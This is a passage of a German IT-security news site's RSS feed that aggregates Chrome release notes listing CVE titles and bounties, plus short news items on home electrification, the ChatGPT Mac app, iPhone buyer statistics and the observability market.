href="https://issuetracker.google.com/499025645"><span>[499025645</span></a><span>] </span><span>High</span><span> CVE-2026-13797 Insufficient validation of untrusted input in Chromecast  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/499022239"><span>[499022239</span></a><span>] </span><span>Medium</span><span> CVE-2026-13879 Use after free in Bluetooth  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/498864176"><span>[498864176</span></a><span>] </span><span>Low</span><span> CVE-2026-14047 Insufficient policy enforcement in Extensions  on  2026-04-02 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/498820206"><span>[498820206</span></a><span>] </span><span>Medium</span><span> CVE-2026-13877 Insufficient validation of untrusted input in ANGLE  on  2026-04-01 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/498722200"><span>[498722200</span></a><span>] </span><span>Medium</span><span> CVE-2026-13876 Inappropriate implementation in Network  on  2026-04-01 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/498411773"><span>[498411773</span></a><span>] </span><span>Medium</span><span> CVE-2026-13874 Inappropriate implementation in DataTransfer  on  2026-03-31 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/498085466"><span>[498085466</span></a><span>] </span><span>Medium</span><span> CVE-2026-13873 Out of bounds memory access in Layout  on  2026-03-31 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497961376"><span>[497961376</span></a><span>] </span><span>Medium</span><span> CVE-2026-13871 Insufficient data validation in GuestView  on  2026-03-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497723649"><span>[497723649</span></a><span>] </span><span>Low</span><span> CVE-2026-14045 Insufficient validation of untrusted input in Network  on  2026-03-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497670996"><span>[497670996</span></a><span>] </span><span>Low</span><span> CVE-2026-14044 Use after free in ANGLE  on  2026-03-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497632232"><span>[497632232</span></a><span>] </span><span>Low</span><span> CVE-2026-14043 Use after free in GetUserMedia  on  2026-03-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497558336"><span>[497558336</span></a><span>] </span><span>Low</span><span> CVE-2026-14042 Inappropriate implementation in Isolated Web Apps  on  2026-03-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497544822"><span>[497544822</span></a><span>] </span><span>Low</span><span> CVE-2026-14041 Insufficient policy enforcement in Serial  on  2026-03-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497488593"><span>[497488593</span></a><span>] </span><span>Low</span><span> CVE-2026-14040 Use after free in BrowserTag  on  2026-03-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497358012"><span>[497358012</span></a><span>] </span><span>Low</span><span> CVE-2026-14039 Insufficient policy enforcement in GetUserMedia  on  2026-03-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497345177"><span>[497345177</span></a><span>] </span><span>Medium</span><span> CVE-2026-13867 Inappropriate implementation in Geolocation  on  2026-03-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497241148"><span>[497241148</span></a><span>] </span><span>Low</span><span> CVE-2026-14038 Insufficient validation of untrusted input in New Tab Page  on  2026-03-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/497090912"><span>[497090912</span></a><span>] </span><span>Medium</span><span> CVE-2026-13865 Insufficient validation of untrusted input in Enterprise  on  2026-03-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/496522611"><span>[496522611</span></a><span>] </span><span>Low</span><span> CVE-2026-14037 Insufficient policy enforcement in GPU  on  2026-03-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/496411061"><span>[496411061</span></a><span>] </span><span>Low</span><span> CVE-2026-14036 Insufficient policy enforcement in Bluetooth  on  2026-03-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/496399913"><span>[496399913</span></a><span>] </span><span>Medium</span><span> CVE-2026-13864 Insufficient policy enforcement in WebHID  on  2026-03-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/496371586"><span>[496371586</span></a><span>] </span><span>Low</span><span> CVE-2026-14035 Insufficient policy enforcement in Bluetooth  on  2026-03-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/495459838"><span>[495459838</span></a><span>] </span><span>Low</span><span> CVE-2026-14031 Incorrect security UI in File Input  on  2026-03-23 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/495456765"><span>[495456765</span></a><span>] </span><span>Medium</span><span> CVE-2026-13861 Use after free in Core  on  2026-03-23 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/492410546"><span>[492410546</span></a><span>] </span><span>Medium</span><span> CVE-2026-14383 Inappropriate implementation in V8  on  2026-03-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/491894115"><span>[491894115</span></a><span>] </span><span>High</span><span> CVE-2026-13796 Integer overflow in Chromecast  on  2026-03-11 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/488762971"><span>[488762971</span></a><span>] </span><span>Low</span><span> CVE-2026-14030 Incorrect security UI in SplitView  on  2026-03-01 </span></p><p dir="ltr"><span>[$5000.0] </span><a href="https://issuetracker.google.com/479203484"><span>[479203484</span></a><span>] </span><span>Medium</span><span> CVE-2026-13857 Inappropriate implementation in Geometry Reported by [Luan Herrera (@lbherrera_)] on  2026-01-27 </span></p><p dir="ltr"><span>[$10000.0] </span><a href="https://issuetracker.google.com/457771782"><span>[457771782</span></a><span>] </span><span>High</span><span> CVE-2026-13790 Side-channel information leakage in Scroll Reported by [] on  2025-11-04 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/417052041"><span>[417052041</span></a><span>] </span><span>Medium</span><span> CVE-2026-13860 Incorrect security UI in Autofill  on  2025-05-11 </span></p><p dir="ltr"><span>[$500.0] </span><a href="https://issuetracker.google.com/527385397"><span>[527385397</span></a><span>] </span><span>High</span><span> CVE-2026-15132 Uninitialized Use in V8  on  2026-06-24 </span></p><p dir="ltr"><span>[$500.0] </span><a href="https://issuetracker.google.com/527406824"><span>[527406824</span></a><span>] </span><span>High</span><span> CVE-2026-15133 Use after free in InterestGroups  on  2026-06-24 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/526542464"><span>[526542464</span></a><span>] </span><span>Medium</span><span> CVE-2026-15131 Insufficient data validation in Navigation  on  2026-06-22 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/526541544"><span>[526541544</span></a><span>] </span><span>High</span><span> CVE-2026-15130 Insufficient policy enforcement in Navigation  on  2026-06-22 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/524045160"><span>[524045160</span></a><span>] </span><span>Critical</span><span> CVE-2026-15129 Use after free in Views  on  2026-06-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523756329"><span>[523756329</span></a><span>] </span><span>High</span><span> CVE-2026-15128 Inappropriate implementation in Forms  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523752265"><span>[523752265</span></a><span>] </span><span>High</span><span> CVE-2026-15127 Inappropriate implementation in WebGL  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523748081"><span>[523748081</span></a><span>] </span><span>High</span><span> CVE-2026-15126 Use after free in Forms  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523737685"><span>[523737685</span></a><span>] </span><span>High</span><span> CVE-2026-15125 Inappropriate implementation in Forms  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523735038"><span>[523735038</span></a><span>] </span><span>High</span><span> CVE-2026-15124 Insufficient policy enforcement in Passwords  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523729553"><span>[523729553</span></a><span>] </span><span>High</span><span> CVE-2026-15123 Insufficient data validation in DOM  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523712556"><span>[523712556</span></a><span>] </span><span>High</span><span> CVE-2026-15121 Use after free in WebRTC  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523505418"><span>[523505418</span></a><span>] </span><span>High</span><span> CVE-2026-15119 Inappropriate implementation in GetUserMedia  on  2026-06-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523238265"><span>[523238265</span></a><span>] </span><span>High</span><span> CVE-2026-15118 Use after free in Input  on  2026-06-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/522568496"><span>[522568496</span></a><span>] </span><span>High</span><span> CVE-2026-15117 Use after free in Payments  on  2026-06-10 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/522092013"><span>[522092013</span></a><span>] </span><span>High</span><span> CVE-2026-15116 Use after free in Actor  on  2026-06-09 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/520565945"><span>[520565945</span></a><span>] </span><span>High</span><span> CVE-2026-15114 Out of bounds read and write in Codecs  on  2026-06-05 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518006275"><span>[518006275</span></a><span>] </span><span>Critical</span><span> CVE-2026-15112 Use after free in Ozone  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517508651"><span>[517508651</span></a><span>] </span><span>High</span><span> CVE-2026-15111 Use after free in Views  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516899138"><span>[516899138</span></a><span>] </span><span>High</span><span> CVE-2026-15109 Uninitialized Use in ANGLE  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515443146"><span>[515443146</span></a><span>] </span><span>High</span><span> CVE-2026-15108 Integer overflow in Extensions API  on  2026-05-21 </span></p><p dir="ltr"><span>[$2000.0] </span><a href="https://issuetracker.google.com/503553615"><span>[503553615</span></a><span>] </span><span>Medium</span><span> CVE-2026-15107 Use after free in IndexedDB  on  2026-04-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/532929679"><span>[532929679</span></a><span>] </span><span>High</span><span> CVE-2026-15777 Use after free in UI  on  2026-07-09 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/532595489"><span>[532595489</span></a><span>] </span><span>High</span><span> CVE-2026-15776 Type Confusion in V8  on  2026-07-08 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/531319201"><span>[531319201</span></a><span>] </span><span>High</span><span> CVE-2026-15775 Insufficient policy enforcement in V8  on  2026-07-05 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/530646115"><span>[530646115</span></a><span>] </span><span>High</span><span> CVE-2026-15774 Use after free in Skia  on  2026-07-03 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/525317502"><span>[525317502</span></a><span>] </span><span>High</span><span> CVE-2026-15772 Use after free in GPU on Android via GLTextureHolder::ReadbackToMemory  on  2026-06-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/524792614"><span>[524792614</span></a><span>] </span><span>High</span><span> CVE-2026-15770 Uninitialized Use in V8  on  2026-06-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/519731111"><span>[519731111</span></a><span>] </span><span>High</span><span> CVE-2026-15769 Insufficient validation of untrusted input in Linux Toolkit Theming  on  2026-06-03 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518007484"><span>[518007484</span></a><span>] </span><span>Critical</span><span> CVE-2026-15765 Use after free in Ozone  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517931625"><span>[517931625</span></a><span>] </span><span>High</span><span> CVE-2026-15768 Insufficient policy enforcement in HTML-in-Canvas  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517100492"><span>[517100492</span></a><span>] </span><span>Critical</span><span> CVE-2026-15764 Use after free in Ozone  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514748734"><span>[514748734</span></a><span>] </span><span>High</span><span> CVE-2026-15767 Heap buffer overflow in libyuv  on  2026-05-19 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514010477"><span>[514010477</span></a><span>] </span><span>High</span><span> CVE-2026-15766 Uninitialized Use in Skia  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513795122"><span>[513795122</span></a><span>] </span><span>Medium</span><span> CVE-2026-15778 Insufficient validation of untrusted input in Navigation  on  2026-05-16 </span></p><br></span></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.128/.129 for Windows and Mac and 150.0.7871.128 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept rest...]]></description>
<link>https://tsecurity.de/de/3678843/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678843/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.128/.129 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.128 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.126..150.0.7871.129?pretty=fuller&amp;n=10000">Log</a></span></p><p><span>Security Fixes and Rewards</span></p><p><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><p><span>This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:3-M150"><span>7</span></a><span> security fixes. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span>Chrome Security Page</span></a><span> for more information.</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/516987782"><span>516987782</span></a><span>]</span><span> Critical </span><span>CVE-2026-15899: Use after free in CameraCapture. </span><span>Reported by Google on 2026-05-27</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/523750584"><span>523750584</span></a><span>]</span><span> Critical </span><span>CVE-2026-15900: Use after free in GPU. </span><span>Reported by Google on 2026-06-14</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/533446300"><span>533446300</span></a><span>]</span><span> Critical </span><span>CVE-2026-15901: Use after free in Network. </span><span>Reported by Google on 2026-07-10</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/522436154"><span>522436154</span></a><span>]</span><span> High </span><span>CVE-2026-15902: Use after free in Cast. </span><span>Reported by Google on 2026-06-10</span></p><p><span>[TBD][</span><a href="https://issues.chromium.org/issues/531503216"><span>531503216</span></a><span>]</span><span> High </span><span>CVE-2026-15903: Out of bounds read and write in V8. </span><span>Reported by OpenAI Codex Security (amyb) on 2026-07-06</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/532925350"><span>532925350</span></a><span>]</span><span> High </span><span>CVE-2026-15904: Use after free in Ozone. </span><span>Reported by Google on 2026-07-09</span></p><p><span>[N/A][</span><a href="https://issues.chromium.org/issues/532970574"><span>532970574</span></a><span>]</span><span> High </span><span>CVE-2026-15905: Use after free in Aura. </span><span>Reported by Google on 2026-07-09</span></p><p><span>We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><p><span>Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span>, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span>, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span>, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span>.</span></p><div><span><br></span></div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Desktop Update]]></title>
<description><![CDATA[The Dev channel has been updated to 152.0.7953.3 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place to...]]></description>
<link>https://tsecurity.de/de/3678841/it-security-nachrichten/chrome-dev-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678841/it-security-nachrichten/chrome-dev-for-desktop-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Dev channel has been updated to 152.0.7953.3 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7939.3..152.0.7953.3?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[💚 Our Family's Electrotech Journey 🌞🏡🔌⛽️🚘️ (emf2026)]]></title>
<description><![CDATA[The story of how we went all electric, ditched fossil fuels, disconnected our gas supply and stopped burning stuff, and how you can too.

Our experience of converting a ~100 year old semi-detached house to modern clean living, and electrifying other parts of our lifestyle, such as travelling with...]]></description>
<link>https://tsecurity.de/de/3678185/it-security-video/our-familys-electrotech-journey-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678185/it-security-video/our-familys-electrotech-journey-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 17:18:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The story of how we went all electric, ditched fossil fuels, disconnected our gas supply and stopped burning stuff, and how you can too.

Our experience of converting a ~100 year old semi-detached house to modern clean living, and electrifying other parts of our lifestyle, such as travelling without flying.

Advice on switching to (and charging) electric vehicles, solar panels and home batteries, insulation, induction hobs and heat pumps. Mistakes made, lessons learned, what we'd do differently next time and how much it saves us.

How to monitor, control and automate your low carbon tech with open energy monitor and home assistant. Tips for making things work together well and play nicely with each other. The perils of cloud integrations and vendors shutting down systems.

Also covering self-built (and bought) air quality monitors for citizen science and environmental monitoring of the changes in air pollution. How to make projects such as Sensor Community and pull the data into your local home management system.

Discover how to be greener, healthier, safer, more resilient/secure, spend less money and have fun geeking out on it along the way.

Learn from our real-world experience in this electrifying talk.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/82-our-familys-electrotech-journey]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI fixes confusing ChatGPT Mac app with easier access to chats and Projects]]></title>
<description><![CDATA[OpenAI has released a new ChatGPT Mac app update that makes regular chats easier to find after users criticised the recent redesign. The company has now restored clearer access to Chat, Work, Codex, conversation history, and Projects inside the main window.



Last week, OpenAI replaced its previ...]]></description>
<link>https://tsecurity.de/de/3678060/ios-mac-os/openai-fixes-confusing-chatgpt-mac-app-with-easier-access-to-chats-and-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678060/ios-mac-os/openai-fixes-confusing-chatgpt-mac-app-with-easier-access-to-chats-and-projects/</guid>
<pubDate>Sat, 18 Jul 2026 15:26:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI has released a new ChatGPT Mac app update that makes regular chats easier to find after users criticised the recent redesign. The company has now restored clearer access to Chat, Work, Codex, conversation history, and Projects inside the main window.



Last week, OpenAI replaced its previous native Mac client with a larger Electron-based app that combined ChatGPT, Codex, and the new Work agent. The company also renamed the older version ChatGPT Classic, which left many users confused about which app they should use.



The redesigned interface placed Codex and Work in a prominent menu, while standard ChatGPT opened through a smaller button in a floating window. That window also lacked direct access to existing chats and Projects, which quickly became the main complaint among Mac users.



Users shared their concerns on OpenAI’s Community forums and X, where they criticised the app’s layout and the reduced visibility of normal ChatGPT features. OpenAI executive Thibault Sottiaux later acknowledged the feedback and confirmed that the company would improve the interface.



Chat and Work now have a clearer layout



The latest update adds a visible toggle at the top of the window for switching between Chat and Work. A sidebar menu now lets users choose between regular ChatGPT and Codex, while chats and Projects are easier to access from the main interface.



The update addresses the most confusing parts of the redesign, although OpenAI may continue adjusting the app as more users test the unified Mac experience.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google is making no progress on switching iPhone users to Android]]></title>
<description><![CDATA[Existing iPhone owners continue to account for nearly nine in 10 surveyed U.S. purchases, showing how Apple's enormous customer base isn't dwindling under pressure from Google and other Android smartphone manufacturers.iPhone 17Consumer Intelligence Research Partners estimates that 87% of U.S. iP...]]></description>
<link>https://tsecurity.de/de/3676683/ios-mac-os/google-is-making-no-progress-on-switching-iphone-users-to-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676683/ios-mac-os/google-is-making-no-progress-on-switching-iphone-users-to-android/</guid>
<pubDate>Fri, 17 Jul 2026 19:26:37 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Existing <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> owners continue to account for nearly nine in 10 surveyed U.S. purchases, showing how Apple's enormous customer base isn't dwindling under pressure from Google and other Android smartphone manufacturers.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68278-143927-iPhone-17-back-xl.jpg" alt="Dark gray iPhone lying face down on a light surface, showing dual rear cameras, Apple logo, side buttons, and subtle reflections on its smooth, slightly angled body" height="738"><span>iPhone 17</span></div><br>Consumer Intelligence Research Partners estimates that 87% of U.S. iPhone buyers in the March 2026 quarter came from another iPhone. The share reached its highest level in the three years covered by the report, up from 84% in 2025 and 85% in 2024.<br><br>Another 12% switched from an Android smartphone, down from 14% in 2025 and slightly below the 13% measured in 2024. The remaining 1% came from a basic phone, bought a first smartphone, or fell into another category.<br><br>The numbers point to a smartphone market in which most buyers settled on a platform years ago. Apple can still attract Android owners, but the larger opportunity comes from convincing hundreds of millions of existing customers to replace an older iPhone with a newer model.<br><br><br> <a href="https://appleinsider.com/articles/26/07/17/google-is-making-no-progress-on-switching-iphone-users-to-android?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244984?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI workloads shake up observability market]]></title>
<description><![CDATA[Observability platforms are evolving beyond traditional monitoring as vendors add AI capabilities and cost-management features aimed at helping enterprise organizations better manage increasingly complex IT environments.



Vendors are investing heavily in AI observability, autonomous investigati...]]></description>
<link>https://tsecurity.de/de/3676598/it-security-nachrichten/ai-workloads-shake-up-observability-market/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676598/it-security-nachrichten/ai-workloads-shake-up-observability-market/</guid>
<pubDate>Fri, 17 Jul 2026 18:28:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/972187/how-to-shop-for-network-observability-tools.html" target="_blank">Observability platforms</a> are evolving beyond traditional monitoring as vendors add AI capabilities and cost-management features aimed at helping enterprise organizations better manage increasingly complex IT environments.</p>



<p class="wp-block-paragraph">Vendors are investing heavily in AI observability, autonomous investigations, cost optimization, and operational intelligence as they try to evolve their platforms into systems that help IT teams understand problems, identify root causes, and determine the best course of action, according to Gartner, which just published its latest <a href="https://www.gartner.com/en/documents/8114397" target="_blank" rel="noreferrer noopener">Magic Quadrant for Observability Platforms</a>.</p>



<p class="wp-block-paragraph">Gartner defines the observability category as technologies that help organizations understand and optimize the health, performance, and behavior of applications, infrastructure, services, AI agents, and user experiences by collecting and analyzing telemetry data, such as logs, metrics, events, and traces.</p>



<p class="wp-block-paragraph">There are 19 vendors that made the cut for Gartner’s new report. Its Leaders quadrant includes (alphabetically) Chronosphere, Coralogix, Datadog, Dynatrace, Elastic, Grafana Labs, IBM, and New Relic. The Challengers are Alibaba Cloud, Amazon Web Services, LogicMonitor, Microsoft, and Splunk. The two Visionaries are BMC Helix and Honeycomb. Those dubbed Niche Players are Apica, HPE, ScienceLogic, and SolarWinds. (For specific vendor strengths and cautions, check out the full Gartner report. Some vendors offer free versions of the report with registration.)</p>



<p class="wp-block-paragraph">Looking beyond quadrant placement, Gartner advises organizations to evaluate vendors based on their ability to deliver full-stack observability and their “roadmap credibility” in key areas such as AI observability, OpenTelemetry interoperability, and the ability to observe and govern AI agents.</p>



<h2 class="wp-block-heading">AI observability emerges as a key differentiator</h2>



<p class="wp-block-paragraph">Organizations are increasingly looking for visibility into AI workloads, including token consumption, model latency, response quality, hallucination rates, and other AI-specific performance metrics, according to the report. Gartner identifies <a href="https://www.networkworld.com/article/4047640/ai-networking-success-requires-deep-real-time-observability.html" target="_blank">AI observability</a> as an emerging requirement, driven by growing enterprise interest in large language models (LLMs), genAI applications, and agentic AI systems.</p>



<p class="wp-block-paragraph">The report recognizes a growing number of vendors introducing AI-focused monitoring, autonomous investigations, AI agents, and specialized observability capabilities designed to help organizations monitor and govern AI-powered applications and workflows. At the same time, Gartner clarifies that many claims surrounding autonomous operations remain ahead of reality. </p>



<p class="wp-block-paragraph">“The transition from generative AI assistants to autonomous agents is more complex than vendor marketing suggests,” the report states.</p>



<h2 class="wp-block-heading">Cost management becomes a top priority</h2>



<p class="wp-block-paragraph">While AI may dominate vendor messaging, Gartner states that telemetry cost management remains one of the top concerns for enterprise buyers.</p>



<p class="wp-block-paragraph">As organizations collect larger amounts of logs, traces, metrics, and events, observability spending is increasingly attracting attention from finance and procurement teams. Gartner notes that 5% of its clients now spend more than $10 million annually with a single observability provider.</p>



<p class="wp-block-paragraph">Gartner describes pipeline management as a strategic layer that is becoming central to observability deployments. Vendors that fail to address these cost concerns risk losing customers to vendor-agnostic alternatives focused on telemetry optimization. Organizations increasingly want platforms that can provide cost attribution, utilization insights, and financial metrics that help justify observability investments, according to Gartner.</p>



<p class="wp-block-paragraph">Gartner projects the observability market will reach $14.3 billion by 2028, driven increasingly by organizations’ need to manage growing telemetry volumes.</p>



<h2 class="wp-block-heading">OpenTelemetry is table stakes as consolidation continues</h2>



<p class="wp-block-paragraph">The growing impact of open standards is a major shift for observability, Gartner notes.</p>



<p class="wp-block-paragraph">The widespread adoption of <a href="https://www.networkworld.com/article/3621642/5-reasons-why-2025-will-be-the-year-of-opentelemetry.html" target="_blank">OpenTelemetry</a> and eBPF-based instrumentation has lowered barriers to switching observability providers and made telemetry collection increasingly commoditized, the research firm explains. Gartner says many enterprise buyers now consider OpenTelemetry support a baseline requirement rather than a differentiator.</p>



<p class="wp-block-paragraph">As a result, vendors are now trying to differentiate themselves through analytics, automation, AI capabilities, and user experience rather than proprietary data collection approaches. That shift is forcing vendors to demonstrate value beyond monitoring and visibility, as buyers seek platforms capable of accelerating troubleshooting, automating investigations, and improving operational outcomes, according to Gartner.</p>



